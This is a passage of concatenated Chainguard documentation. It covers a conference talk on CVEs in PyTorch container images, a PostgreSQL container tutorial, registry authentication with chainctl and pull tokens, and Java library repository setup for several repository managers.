We also wanted to share some metrics around the overall adoption of containers for AI applications. As of the end of 2023 there was a 58% increase of GPU instance hours usage. This was by a report from data dog and this has to do with the increase in the need for both training and inference workloads associated with GenAI applications. There’s also an interesting metric here, and this is more of a forecast, but while AI components have not made it to every Enterprise application (even though it sure feels like it has) it is estimated by 2025 90% of most Enterprise applications will have some AI component within them. And lastly the hosting or the spend for cloud resources associated with Cloud applications is estimated to be $200 billion dollars by the end of 2030, this was by a Cloud Revenue estimate offered by Goldman Sachs. So this kind of gives you an idea of why we decided to focus on this, but obviously we’re at the PyTorch conference and we wanted to highlight that really the the important part here is that PyTorch has a key role in the AI supply chain and this is because it has widespread use for both deploying and developing models. The flexibility, the strength of the community, and the ease of use has made it one of the most popular container images across the board and that that means that it has now become the foundation to a lot of libraries and projects. Due to the far-reaching scope and use cases for this specific technology, it now also means that the attack surface for AI applications via PyTorch has also increased significantly over time. So any organization or any Enterprise that is deploying an AI application that is concerned with data privacy also now has to be concerned with maintaining all the components, in this case container images, making sure that they’re up to date. And that’s what we’re going to focus on the rest of this presentation. Patrick is going to walk us through some of the metrics around vulnerabilities associated with the PyTorch image. (Patrick Smyth) All right, thanks Dan! So PyTorch has been downloaded over 10 million times in the last year and so you know this is an application that really matters because if you secure the PyTorch container image you’re securing literally millions of deployments across the planet. So let’s dig a little bit into to PyTorch in terms of security. The last build of the PyTorch container image had 1 critical, 5 high, 40 mediumand over 50 low CVEs. You might be like hey that sounds like a lot. That’s actually not that far off industry standard which is you know maybe even slightly unfortunate. Unfortunately, CVEs do really matter. What are CVEs? They are Common Vulnerabilities and Exposures. They are known vulnerabilities in software that actually affect the security posture of that software and CVEs can be looked up in a database so these are vulnerabilities that can, should, and in some cases must (in the case of for example fed ramp compliance) be remediated. So if you’re doing FedRAMP you need to fix them within a month. So unfortunately there’s an upstream problem. If you’re someone who wants to run a model in inference, wants to develop an application, then probably about maybe 2% of the CVEs that are in that application, that code, or that production deployment might be introduced by your team. The rest come from Upstream, whether they be language runtimes or whether they be OSes. As the person at the end of that you’re responsible for it. But how do you fix all of that? It becomes very difficult. 
You have to employ CVE remediation teams and so on. So at Chainguard we create low to no, frequently zero, CVE images. And how do we do that? We do a couple of different things. We build fresh. We patch when needed. We issue advisories and we really strive for the images to be as minimal as possible. And when you’re aiming for zero every removed package really matters because every package is a potential source of CVEs that could pop up literally any day. So in terms of zero—well, is zero just a marketing thing? I mean maybe some of you have used CVE scanners. Maybe you’ve played around with this or maybe you’re responsible for this. You may never have actually seen a scan come back with zero CVEs. When I joined Chainguard I was like is this just marketing? But actually we work really hard at this. We do it every day, and we actually do get to zero CVEs, which is kind of remarkable. And I’m still surprised by it. But it’s possible. So let’s get a little into the nitty-gritty. So just to talk about “minimal” for a minute. This is a comparison of the attack surface of the current PyTorch image versus the recently built Chainguard PyTorch image. I’m speaking specifically about the runtime PyTorch image here. So if you look we have about 75 packages in the Chainguard PyTorch image versus about 200 in the current PyTorch image and we have about 400 executables versus 1400 in the current PyTorch image. I’m going to hand things over to Srishti so she can go into a little more detail. (Srishti Hegde) Thank you. So talking about the minimal set of packages, what it really means is a reduction in the image size. And, case in point, our Chainguard PyTorch image is actually only half the size of the upstream image you see there. So talking about how we arrived there, there are a couple of things. We ship a prod and a dev variant of the image, and within our prod variant we’ve stripped a lot of things. That’s your shell, development utilities, diagnostic tools, and network libraries. We’ve also tried to greatly reduce the complexities introduced by package managers by stripping them down to the bare minimum. But not all use cases are production use cases. There are cases where you need to have access to development tools. So you can always use the dev variant of our image, which has access to a larger set of dev utilities. I think one of the biggest challenges we had in arriving at this place is the very complex version matrix of all the components that together constitute torch. And as many of you might know, most of them are quite tightly coupled and it’s down to the toolchain that’s actually used to build torch. There’s a lot of back and forth involved. I think as of now the upstream PyTorch cuts a release every 5 weeks or so. Every time a new release comes out Chainguard builds an image for this particular variant in all versions of Python that’s supported. These images are constantly scanned and patched whenever there’s a CVE that shows up. And our images are built nightly, so really they’re fresh as they come. In addition to zero CVE and minimal images we also build FIPS-compliant images. So a number of you might have a requirement for these images as well. Though we have a very minimal set of packages it’s always good to know what’s actually running in your system. To that end the PyTorch image that we ship out comes with an SBOM that tells you what’s in the image.
The PyTorch image, just like all the other Chainguard images, is compliant with the SLSA standards, which means that you get a verifiable history of the build, giving you information about how the image was built, including the dependencies that went into it, the source code, and the build system itself. (Patrick Smyth) We wanted to provide you with a couple of starting places. So if you’re interested in taking a a test drive of the recently built zero CVE PyTorch image, you can take a look at this QR code on the left, that’s our PyTorch image there in our image catalog. Another great place to start is the recently released Securing the AI/ML Supply Chain course, which has seven modules that cover all sorts of different things from the compliance ecosystem to tooling and scanning and also some training and inference. It’s a great place to start. Similarly, we do a monthly Learning Lab focused on different secure application Frameworks and language runtimes. I just did one on our AI images including PyTorch. If you want to check out the next one coming up you can scan this QR code. This is Wolfi, the tiniest octopus in the world. (We go for minimal here.) You can see him going into his hole. Before we get to questions, I’ll just say that the techniques we’ve discussed here, from building fresh (going from every five weeks to every night), including SBOMs, going minimal—these are all things that could be applied to the current PyTorch image to make it more secure. And that could really affect security in production environments around the world. Thank you all. --- ### Getting Started with the PostgreSQL Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/postgres/ Last Modified: March 24, 2025 Tags: Chainguard Containers, Product PostgreSQL — commonly known as “Postgres” — is a popular open-source relational database. The PostgreSQL Containers based on Wolfi and maintained by Chainguard provide distroless container images that are suitable for building and running PostgreSQL workloads. Because Chainguard Containers (including the PostgreSQL container image) are rebuilt daily with the latest sources and include the absolute minimum of dependencies, they have significantly fewer vulnerabilities than equivalent container images, typically zero. This means you can use the Chainguard PostgreSQL container image to run Postgres databases in containerized environments with a smaller footprint and greater security. In order to illustrate how the PostgreSQL Chainguard Container might be used in practice, this tutorial involves setting up an example PHP application that uses a Postgres database. This guide assumes you have Docker installed to run the demo; specifically, the procedure outlined in this guide uses Docker Compose to manage the environment on your local machine. What is distroless Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Images Chainguard Containers are a mix of distroless and development container images based on Wolfi. 
Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Step 1: Setting up a demo application This step involves downloading the demo application code to your local machine. To ensure that the application files don’t remain on your system navigate to a temporary directory like /tmp/. cd /tmp/ Your system will automatically delete the /tmp/ directory’s contents the next time it shuts down or reboots. The code that comprises this demo application is hosted in a public GitHub repository managed by Chainguard. Pull down the example application files from GitHub with the following command. git clone --sparse https://github.com/chainguard-dev/edu-images-demos.git Because this guide’s demo application code is stored in a repository with other examples, we don’t need to pull down every file from this repository. For this reason, this command includes the --sparse option. This will initialize a sparse-checkout file; this causes the working directory to contain only the files in the root of the repository until the sparse-checkout configuration is modified. Navigate into this new directory. cd edu-images-demos To retrieve the files you need for this tutorial’s sample application, run the following git command. git sparse-checkout set postgres This modifies the sparse-checkout configuration initialized in the previous git clone command so that the checkout only consists of the repo’s postgres directory. Navigate into this new directory. cd postgres/ From here, you can run the application and use a web browser to observe it working in real time, which we’ll do in the next section. Step 2: Inspect, run, and test the sample application We encourage you to check out the application code on GitHub to better understand how this application works, but we’ll provide a brief overview here. This demo creates a LEPP (Linux, (E)NGINX, PostgreSQL and PHP-FPM) environment based on Wolfi Chainguard Containers. We will use Docker Compose to bring up the environment, which will spin up three containers: an app container, a postgres container, and an nginx container. These will run as services. Once the environment is up, you can visit the demo in your web browser. The index.php file contains code that does the following: Connects to the PostgreSQL server running in the postgres container Creates a new table named data if it doesn’t already exist Inserts a new entry into the table with a random number Queries the table to show all the entries Every time you reload the page, a new entry will be added to the table. Note that this application includes a Dockerfile. cat Dockerfile FROM cgr.dev/chainguard/php:latest-fpm-dev USER root RUN apk update && apk add php-pgsql USER php This Dockerfile takes the public php:latest-fpm-dev Chainguard Container and installs the php-pgsql package onto it. This container image comes with drivers that allow PHP applications to connect to MySQL or MariaDB databases by default but it doesn’t have an equivalent for PostgreSQL. For this reason, we use this Dockerfile to install this package in order for the PHP application to be able to connect to the Postgres database. Execute the following command to build a container with this Dockerfile, and then create and start each of the three containers and bring up the application. docker compose up -d The -d option is short for --detach; this will cause the containers to run in the background, allowing you to continue using the same terminal window. 
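As a quick check (not part of the original walkthrough), you can confirm that the app, postgres, and nginx services came up before moving on:

```sh
# List the services started by docker compose; all three should show a "running" status.
docker compose ps

# Optionally follow the postgres service logs to confirm the database finished initializing.
docker compose logs postgres
```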
If you run into permissions issues when running this command, try running it again with sudo privileges. Note: If at any point you’d like to stop and remove these containers, run docker compose down. Once all the containers have started, you’ll be able to visit the application and observe it working. Open up your preferred web browser and navigate to localhost:8000. There, you’ll be presented with text like the following Every time you refresh your browser, a new entry will appear. This shows that the application is recording each visit in the PostgreSQL database and that the application is working correctly. After confirming that the application is functioning as expected, you can read through the next section to explore how else you can work with the postgres container. Step 3: Working with the database The docker-compose.yml file contains some configuration details regarding the PostgreSQL database used in this example application. Run the following command to inspect the contents of this file. cat docker-compose.yml We’re interested in the postgres service: . . . postgres: image: cgr.dev/chainguard/postgres restart: unless-stopped environment: POSTGRES_USER: php POSTGRES_PASSWORD: password POSTGRES_DB: php-test ports: - 5432:5432 networks: - wolfi . . . This section defines a few environment variables relating to the database used in the example application. Importantly, they specify that the application database is named php-test and runs under a user named php with the password “password”. Using this information, you can connect to the php-test database running in the container with a command like the following. docker exec -it postgres-postgres-1 \ psql -p 5432 -U php -W -d php-test docker exec allows you to execute commands within a running container. The -i argument allows you to execute an interactive command while the -t option allocates a pseudo-TTY to the process within the container. Because our goal is to access the sample database through the psql command line client, these options are necessary. Next, enter the name of the container running the PostgreSQL database; by default, this will be named postgres-postgres-1. Following that, the remainder of this command represents the command that will be run within the container. Here, we run the psql command to access the database specifying that we want to connect over port 5432 as the php user. The -W option indicates that we want to be prompted to enter the password interactively, and -d php-test specifies that we want to connect to the php-test database. Password: Enter password and you’ll then be presented with the psql command prompt. psql (15.3) Type "help" for help. php-test=# From here, you can interact with the database from within the postgres-postgres-1 container as you would with any other PostgreSQL database. For example, you could update existing tables, create new ones, and insert or delete data. To close the psql prompt, you can enter the following command. \q Of course, you likely won’t be regularly managing your containerized databases over the command line. The purpose of this section is to only show that you can interact with the database running in this container just like you would with any other Postgres database. Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose PostgreSQL Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. 
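One way to do that check (a quick sketch, assuming Docker is available locally; php-pgsql is only used here as an example package name) is to search the Wolfi package index from inside a wolfi-base container:

```sh
# Start a throwaway wolfi-base container and search the Wolfi package index.
docker run --rm cgr.dev/chainguard/wolfi-base \
  sh -c "apk update && apk search php-pgsql"
```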
Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk add you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as the base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. Configuring the PostgreSQL container image You can extend Chainguard’s PostgreSQL container image with environment variables. Chainguard’s PostgreSQL container image is compatible with the environment variables available in the official PostgreSQL image, including the following: PGDATA: This variable allows you to define another location for database files. The default data directory is /var/lib/postgresql/data. POSTGRES_PASSWORD: This environment variable sets the superuser password for PostgreSQL. This variable is required to use the PostgreSQL image. POSTGRES_USER: This is used with the POSTGRES_PASSWORD variable to set a superuser for the database and its password. If not specified, you can use the default postgres user. POSTGRES_DB: Using this variable allows you to set a different name for the default database. If not specified, the default database will be postgres or the value set by POSTGRES_USER. POSTGRES_INITDB_ARGS: This variable allows you to send arguments to postgres initdb. POSTGRES_INITDB_WALDIR: You can set this variable to define the location for the PostgreSQL transaction log. By default, the transaction log is stored in a subdirectory of the main PostgreSQL data folder, which you can define with PGDATA. POSTGRES_HOST_AUTH_METHOD: This variable allows you to control the auth-method used to authenticate when connecting to the database. Note that if you set the POSTGRES_HOST_AUTH_METHOD variable to trust, then the POSTGRES_PASSWORD variable is no longer required: docker run --rm -e POSTGRES_HOST_AUTH_METHOD=trust -e POSTGRES_DB=linky -ti --name postgres-test cgr.dev/ORGANIZATION/postgres:latest Be aware that the Docker-specific variables will only have an effect if you start the container with an empty data directory; pre-existing databases won’t be affected on container startup. You can also run the Chainguard PostgreSQL container image with a custom configuration file. The following example will mount a PostgreSQL configuration file named my-postgres.conf to the container. docker run --rm -v "$PWD/my-postgres.conf":/etc/postgresql/postgresql.conf -e POSTGRES_PASSWORD=password -ti --name postgres-test cgr.dev/ORGANIZATION/postgres:latest -c 'config_file=/etc/postgresql/postgresql.conf' This command also uses the postgres server’s -c flag to set the config_file runtime parameter. --- ### Authenticate to Chainguard's Registry URL: https://edu.chainguard.dev/chainguard/chainguard-registry/authenticating/ Last Modified: April 11, 2025 Tags: Chainguard Containers, Product, Registry Public Container Images Chainguard offers a collection of images that are publicly available, don’t require authentication, and are free to use by anyone.
However, logging in with a Chainguard account and authenticating when pulling from the registry gives you access to the Chainguard Console, and provides a mechanism for Chainguard to contact you if there are any issues with images you are pulling. This may enable Chainguard to notify you of upcoming deprecations, changes in behavior, critical vulnerabilities and remediations for images you have recently pulled. Signing Up You can register a Chainguard account through our sign up form. This will create your account and a Chainguard IAM organization. If you already have an account, you can log in through the login page. For more details on signing in, you can review our sign in guidance. If your organization is interested in (or already using) custom identity providers like Okta, you can read how to authenticate to Chainguard with custom identity providers. Authenticating with the chainctl Credential Helper You can configure authentication by using the credential helper included with chainctl. This is the workflow recommended by Chainguard. First install chainctl and configure the credential helper: chainctl auth configure-docker This will update your Docker config file to call chainctl when an auth token is needed. A browser window will open when the token needs to be refreshed. Pulls authenticated in this way are associated with your user. Authenticating with a Pull Token You can also create a “pull token” using chainctl. This generates a longer-lived token that can be used to pull images from other environments that don’t support OIDC, such as some CI environments, Kubernetes clusters, or with registry mirroring tools like Artifactory. First install chainctl, then log in and configure a pull token: chainctl auth configure-docker --pull-token With the latest release of chainctl, this will print a docker login command that can be run in the CI environment to log in with a pull token. You can also pass the --save flag, which will update your Docker config file with the pull token directly. This token expires in 30 days by default, which can be shortened using the --ttl flag (for example, --ttl=24h). Pulls authenticated in this way are associated with a Chainguard identity, which is associated with the organization selected when the pull token was created. Note on Multiple Pull Tokens Running the chainctl auth configure-docker --pull-token command multiple times will result in multiple pull tokens being created. However, the tokens stored in your Docker config when using --save will overwrite old tokens. Tokens cannot be retrieved once they have been overwritten so they must be extracted from the local Docker config and saved elsewhere if multiple are required. Revoking a Pull Token Pull tokens are associated with Chainguard identities so they can be viewed with: chainctl iam identities list To revoke a token, delete the associated identity. chainctl iam identity delete <identity UUID> Managing Pull Tokens in the Chainguard Console You can also create and view pull tokens in the Chainguard Console. After navigating to the Console, click on Settings in the left-hand navigation menu. From the Settings pane, click on Pull tokens. There, you’ll be presented with a table listing of all the active pull tokens for your selected organization. This table shows the name of each pull token, their descriptions, the date they were created, and the number of days until they expire. You can create a new pull token by clicking the Create pull token button at the top of the page. 
A new pane will appear where you can enter a name for the new pull token, add an optional description, and select when the pull token will expire. The Expiration drop-down menu has options for 30, 60, and 90 days, as well as a Custom expiration option. Choosing the latter will cause a Custom Expiration window to appear, allowing you to select the date when you’d like the token to expire. After entering these details, click the Create token button and your new pull token will appear in the list with the rest of your organization’s tokens. Authenticating with GitHub Actions You can configure authentication with OIDC-aware CI platforms like GitHub Actions. First create an identity using chainctl, which can be limited to only allow OIDC federation from certain GitHub workflow runs: chainctl iam identity create github [GITHUB-IDENTITY] \ --github-repo=${GITHUB_ORG}/${GITHUB_REPO} \ --github-ref=refs/heads/main \ --role=registry.pull Note: The value passed to --github-repo should be equal to the repository name you expect to be returned in the subject field of the token from GitHub. If you need to further scope or change the subject you can find a number of useful examples in the “Example subject claims” section of GitHub’s OIDC documentation and then you may update the identity with chainctl iam identities update. This creates a Chainguard identity that can be assumed by a GitHub Actions workflow only for the specified GitHub repository, triggered on pushes to the specified branch (such as refs/heads/main), with permissions only to pull from Chainguard’s registry. When this identity is created, its ID will be displayed. Using this ID, you can configure your GitHub Actions workflow to install chainctl and assume this identity when the workflow runs:

```yaml
name: Registry Example
on:
  push:
    branches: ['main']
permissions:
  contents: read
  id-token: write # This is needed for OIDC federation.
jobs:
  example:
    runs-on: ubuntu-latest
    steps:
      - uses: chainguard-dev/setup-chainctl@main
        with:
          identity: [[The Chainguard Identity ID you created above ]]
      - run: docker pull cgr.dev/chainguard/node
```

Pulls authenticated in this way are associated with the Chainguard identity you created, which is associated with the organization selected when the identity was created. If the identity is configured to only work with GitHub Actions workflow runs from a given repo and branch, that identity will not be able to pull from other repos or branches, including pull requests targeting the specified branch. Authenticating with Kubernetes You can also configure a Kubernetes cluster to use a pull token, as described above. When you create a pull token with --save, your Docker config file is updated to include that token and configure it to be used when pulling images from cgr.dev. After that, you can create a Kubernetes secret based on those credentials, following these instructions: kubectl create secret generic regcred \ --from-file=.dockerconfigjson=<path/to/.docker/config.json> \ --type=kubernetes.io/dockerconfigjson Important Note: this will also make any other credentials you have configured in your Docker config available in the secret. Ensure only the necessary credentials are included. Then you can create a Pod that uses that secret, following these instructions:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: cgr-example
spec:
  containers:
    - name: nginx
      image: cgr.dev/chainguard/nginx:latest
  imagePullSecrets:
    - name: regcred
```

For this example, save the file as cgr-example.yaml.
Then you can create and get the Pod: kubectl apply -f cgr-example.yaml kubectl get pod cgr-example Learn more in our sign in guidance. --- ### Chainguard Libraries for Java Overview URL: https://edu.chainguard.dev/chainguard/libraries/java/overview/ Last Modified: March 31, 2025 Tags: Chainguard Libraries, Java, Overview Introduction Chainguard Libraries for Java represents the first ecosystem support with Chainguard Libraries. The Java and larger JVM ecosystem consists of hundreds of open source projects from large foundations such as the Apache Software Foundation, the Eclipse Foundation, and many smaller foundations and projects. Chainguard Libraries for Java provides access to all open source libraries commonly used. New releases of common libraries or artifacts requested by customers are added to the growing index by an automated system. The number of included libraries continues to grow. The main public repository for binary artifacts is the Maven Central Repository. It has been in operation for nearly 20 years and hosts artifacts of all releases of most open source projects in the Java community. It is the default repository in all commonly used build tools from the Java community including Apache Maven, Gradle, and others and uses the Maven repository format. Chainguard Libraries for Java covers all open source artifacts from Maven Central. Chainguard Libraries for Java also builds binaries for many other open source projects available in other repositories or on code hosting platforms like GitHub. Examples include Google, Oracle, JetBrains, CERN, Apache, and many others. Any request for a library or library version missing in Chainguard Libraries automatically triggers a process to provision the artifacts from relevant sources if available. You can use Chainguard Libraries for Java alongside third-party software repositories to create a single source of truth with your repository manager application. Runtime requirements The runtime requirements for Java artifacts available from Chainguard Libraries for Java are identical to the requirements of the original upstream project. For example, if a JAR retrieved from Maven Central requires Java 17 or higher, the same Java 17 runtime requirement applies to the binary artifact from Chainguard Libraries for Java. Technical details The username and password retrieved with chainctl are required to access the Chainguard Libraries for Java repository. The URL for the repository is: https://libraries.cgr.dev/java/ This Chainguard Libraries for Java repository uses the Maven repository format and only includes release artifacts of the libraries built by Chainguard from source. Snapshot versions are not available. The URL does not expose a browsable directory structure. However, if you know the location of any particular artifact you can use the login credentials and a set path URL to access a file. The Chainguard Libraries for Java repository does not include all artifacts from the Maven Central Repository and other repositories. Specifically, the following components can be required by your application builds, yet are not included: Binary versions of closed-source libraries. The Maven Central Repository and other repositories often include such libraries. They enable interoperability with open source applications and development of internal applications as a combination of these libraries and other open source libraries. 
Examples include JDBC drivers for proprietary databases such as Oracle Other artifacts that are found in the Maven Central Repository with incomplete information about the location of the source code or a pointer to a location with access restrictions or an incomplete source, that prevents creation of a binary by Chainguard. Some types of artifacts are included if the source build produces them, but are often not available: Source JAR artifacts Javadocs JAR artifacts Distributable versions of artifacts such JARs with dependencies or tar.gz archives Other package formats sometimes found such as RPMs, SO files, Android AARs, and similar rarely used artifacts As a result, you must configure the repository as the first point of contact and request for any retrieval of a library. This ensures that any library that is available from Chainguard is also used. In addition, any failed requests are flagged at Chainguard and backfill processes are run where possible. At the same time, you must continue to use the Maven Central Repository, and any other repository that fills the needs for libraries that are not available from the Chainguard Libraries repository. Typically the access is configured globally on a repository manager for your organization. This approach is strongly recommended. Alternatively, you can use the token for direct access from a build tool as discussed in Build configuration. Manual testing You can manually download specific artifacts from the repository if you know the URL as determined by the identifying GAV coordinates for an artifact. For example, you can locate a Maven POM file on the Maven Central Repository: https://repo1.maven.org/maven2/commons-io/commons-io/2.17.0/commons-io-2.17.0.pom And then use the path composed from the Maven coordinates commons-io/commons-io/2.17.0/commons-io-2.17.0.pom And combine it with the URL for the Chainguard Libraries for Java repository to check for the presence of the same file: https://libraries.cgr.dev/java/commons-io/commons-io/2.17.0/commons-io-2.17.0.pom Use the Maven Central Repository search or browse functionality to locate artifacts of interest. If you use the URL directly in a browser, you have to provide the username and password to log in to the Chainguard repository to download the file. Use curl, specify the username and password retrieved with chainctl for basic user authentication and use the URL of the file to download and save the file with the original name. With .netrc authentication: curl -n -L --user "$CHAINGUARD_JAVA_IDENTITY_ID:$CHAINGUARD_JAVA_TOKEN" \ -O https://libraries.cgr.dev/java/commons-io/commons-io/2.17.0/commons-io-2.17.0.pom With environment variables: curl -L --user "$CHAINGUARD_JAVA_IDENTITY_ID:$CHAINGUARD_JAVA_TOKEN" \ -O https://libraries.cgr.dev/java/commons-io/commons-io/2.17.0/commons-io-2.17.0.pom The option -L is required to follow redirects for the actual file locations. Use checksums of any file to verify if it originates from the Chainguard repository. --- ### Global Configuration URL: https://edu.chainguard.dev/chainguard/libraries/java/global-configuration/ Last Modified: April 7, 2025 Tags: Chainguard Libraries, Java Java and JVM library consumption in a large organization is typically managed by a repository manager. Commonly used repository manager applications are Cloudsmith, Google Artifact Registry, JFrog Artifactory, and Sonatype Nexus Repository. The repository manager acts as a single point of access for developers and development tools to retrieve the required libraries. 
At a high level, adopting the use of Chainguard Libraries consists of the following steps: Add Chainguard Libraries as a remote repository for library retrieval. Configure the Chainguard Libraries repository as the first choice for any library access. This ensures that any future requests of new libraries access the version supplied by Chainguard. Typically this is accomplished by creating a group repository or virtual repository that combines the repository with other external and internal repositories. Additional steps depend on the desired insights and can include the following optional measures: Remove all cached artifacts in the proxy repository of Maven Central and other repositories. This step allows you to validate which libraries are not available from Chainguard Libraries and proceed with potential next steps with Chainguard and your own development efforts. Remove any repositories that are no longer desired or necessary. Depending on your library requirements this step can result in removal of some proxy repositories or even removal of all proxy repositories. Adopting the use of a repository manager is the recommended approach; however, if your organization does not use a repository manager, you can still use Chainguard Libraries. All access to the Chainguard Libraries repository is then distributed across all your build platforms and therefore more complex to configure and control. Cloudsmith Cloudsmith supports Maven repositories for proxying and hosting. Refer to the Maven Repository documentation and the Maven Upstream documentation for Cloudsmith for more information. Cloudsmith supports combining repositories by defining multiple upstream repositories. Initial configuration Use the following steps to add a repository with the Maven Central Repository and the Chainguard Libraries for Java repository as Maven upstream repositories. Configure a java-all repository: Log in as a user with administrator privileges. Select the Repositories tab near the top of the screen. On the Repositories page, click the + New repository button. Enter the name java-all for your new repository. The name should include java to identify the ecosystem. This convention helps avoid confusion since repositories in Cloudsmith are multi-format. Select a storage region that is appropriate for your organization and infrastructure. Press + Create Repository. Configure an upstream proxy for the Maven Central Repository: Click the name of the new java-all repository on the repositories page to configure it. Access the Upstreams tab and click + Add Upstream Proxy. Configure an upstream proxy with the format Maven and the following details: Name java-public Priority 2 Upstream URL https://repo1.maven.org/maven2/ Mode Cache and Proxy Press Create Upstream Proxy. Configure an upstream proxy for the Chainguard Libraries for Java repository: Click the name of the java-all repository on the repositories page to configure it. Access the Upstreams tab and click + Add Upstream Proxy. Configure an upstream proxy with the format Maven and the following details: Name java-chainguard Priority 1 Upstream URL https://libraries.cgr.dev/java/ Mode Cache and Proxy Add the Username and Password value from Chainguard Libraries access in Authentication Settings. Press Create Upstream Proxy. Use this setup for initial testing with Chainguard Libraries for Java. For production usage, add the java-chainguard upstream proxy to your production repository.
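To confirm the proxy chain resolves artifacts, one option (a sketch using placeholder credentials and an example organization name; the commons-io coordinates are just a well-known test artifact) is to request a POM through the new java-all repository:

```sh
# Fetch a known artifact through the Cloudsmith repository; a successful download
# indicates the upstream proxies are resolving and caching as expected.
curl -fL --user "$CLOUDSMITH_USERNAME:$CLOUDSMITH_API_KEY" \
  -O https://dl.cloudsmith.io/basic/exampleorg/java-all/maven/commons-io/commons-io/2.17.0/commons-io-2.17.0.pom
```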
Build tool access The following steps allow you to determine the URL and authentication details for accessing the repository: Select the Packages tab. Press Push/Pull Packages. Choose the format Maven. Copy the value in the <url> tag from the XML snippet with the <repositories> entry. For example, https://dl.cloudsmith.io/basic/exampleorg/java-all/maven/ with exampleorg replaced with the name of your organization. Note that the name of the repository java-all as well as maven as identifier for the format are part of the URL. After choosing the desired authentication method of Default or API Key, copy the username and password values from the second code snippet. Choose a different format and the equivalent sections if you are using another build tool such as Gradle. Use the URL of the repository, the username, and the password for the server authentication block in the build configuration, and build a first test project. In a working setup all libraries retrieved from Chainguard are tagged with the name of the upstream proxy. Google Artifact Registry Google Artifact Registry supports the Maven format for hosting artifacts in Standard repositories and proxying artifacts from public repositories in Remote repositories. Use Virtual repositories to combine them for consumption with Maven and other build tools. Use the Java package documentation for Google Artifact Registry as the starting point for more details. Initial configuration Use the following steps to add the Maven Central Repository and the Chainguard Libraries for Java repository as remote repositories and combine them as a virtual repository: Log in to the Google Cloud console as a user with administrator privileges. Navigate to your project and find the Artifact Registry with the search. Activate Artifact Registry if necessary. Navigate to your project and find the Secret Manager with the search. Activate Secret Manager if necessary. Before configuring the repositories, you must create a secret with the password value as retrieved with chainctl: Navigate to the Secret Manager. Press Create secret. Set the Name to chainguard-libraries-java. Use the Password from chainctl output to set the Secret value. Press Create secret. Navigate to Artifact Registry and select Repositories in the left hand navigation under the Artifact Registry label to configure a remote repository for the Maven Central Repository: Press Create a Repository or the + button. Set the Name to java-public. Set the Format to Maven. Select Remote for the Mode. Select Maven Central for the Remote repository source. Choose a suitable Region for your development in Location type. Press Create. Configure a remote repository for the Chainguard Libraries for Java repository: Press the + button to add another repository. Set the Name to java-chainguard. Set the Format to Maven. Select Remote for the Mode. Select Custom for the Remote repository source. Set the URL for the Custom repository to https://libraries.cgr.dev/java/. Select Authenticated in Remote repository authentication mode. Set Username for the upstream repository to the value as retrieved with chainctl. Select the chainguard-libraries-java secret in the list for the Secret input. Choose the same suitable Region for your development in Location type as configured for the java-public repository. Press Create. Combine the two repositories in a new virtual repository: Press the + button to add another repository. Set the Name to java-all. Set the Format to Maven. Select Virtual for the Mode.
Press Add upstream repository in Virtual upstream repositories. Use the Browse button to locate and select the java-chainguard repository as Repository 1 and set the Policy name 1 to java-chainguard. Use the Browse button to locate and select the java-public repository as Repository 1 and set the Policy name 1 to java-public. Press Add upstream repository in Virtual upstream repositories. Set the Priority value for the java-chainguard policy name to a higher value than the java-public priority value. Choose the same suitable Region for your development in Location type as configured for the java-public repository. Press Create. Build tool access The following steps allow you to configure your build tool for accessing the repository: Navigate to Artifact Registry and select Repositories in the left hand navigation under the Artifact Registry label. Click on the java-all repository name in the list of repositories. Press the Setup instructions button and follow the documentation. Note that you must add the extension com.google.cloud.artifactregistry:artifactregistry-maven-wagon to each project. In a working setup, the chainguard remote repository contains all artifacts retrieved from Chainguard. JFrog Artifactory JFrog Artifactory supports Maven repositories for proxying and hosting, and virtual repositories to combine them. Refer to the Maven Repository documentation for Artifactory for more information. Initial configuration Use the following steps to add the Maven Central Repository and the Chainguard Libraries for Java repository as remote repositories and combine them as a virtual repository: Log in as a user with administrator privileges. Press Administration in the top navigation bar. Select Repositories in the left hand navigation. Configure a remote repository for the Maven Central Repository: Press Create a Repository and choose the Remote option. Select Maven as the Package type. Set the Repository Key to java-public. Set the URL to https://repo1.maven.org/maven2/ . Deactivate Maven Settings - Handle Snapshots. Press Create Remote Repository. Configure a remote repository for the Chainguard Libraries for Java repository: Press Create a Repository and choose the Remote option. Select Maven as the Package type. Set the Repository Key to java-chainguard. Set the URL to https://libraries.cgr.dev/java/. Set User Name and Password / Access Token to the values as retrieved with chainctl. Check the Enable Token Authentication checkbox. Press Test to validate the connection. Deactivate Maven Settings - Handle Snapshots. Access the Advanced configuration tab and deactivate the Block Mismatching Mime Types setting in the Others section. Press Create Remote Repository. Combine the two repositories in a new virtual repository: Press Create a Repository and choose the Virtual option. Set the Repository Key to java-all. Scroll down to the Repositories section Add the java-chainguard and java-public repositories. Ensure the java-chainguard repository is the first in the displayed list. Use the icon on the right of the repository name to drag and drop repositories into the desired position. Press Create Virtual Repository. Use this setup for initial testing with Chainguard Libraries for Java. For production usage add the java-chainguard repository to your production virtual repository. Build tool access The following steps allow you to determine the URL and authentication details for accessing the repository: Press Administration in the top navigation bar. 
